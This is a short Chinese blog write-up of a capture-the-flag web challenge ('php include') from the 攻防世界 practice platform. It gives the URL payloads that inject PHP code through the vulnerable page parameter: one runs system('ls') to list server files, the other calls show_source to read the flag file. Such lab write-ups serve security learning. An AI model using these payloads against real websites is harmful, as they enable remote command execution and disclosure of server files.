攻防世界web 进阶 php include

zh道题主要还是看网上的资料来写的,毕竟不会php,没有办法。。。

 

我们发现这个hello是有回显的,所以说不定这里可以命令执行然后会显到浏览器。构造payload,首先要我们传的pade参数为真才行

主要是让page参数用http伪协议访问127.0.0.1这个条件一定为真,在url输入/?page=http://127.0.0.1/?hello=<?system("ls")?>

 

之后得到一个回显 fl4gisisish3r3.php index.php phpinfo.php                                     !!!phpinfo()函数会输出关于 PHP 配置的信息。

之后输入   page=http://127.0.0.1/?hello=<?show_source("fl4gisisish3r3.php");?>

得到flag。

 

posted @ 2020-11-30 22:50  ctfliar  阅读(212)  评论(0)    收藏  举报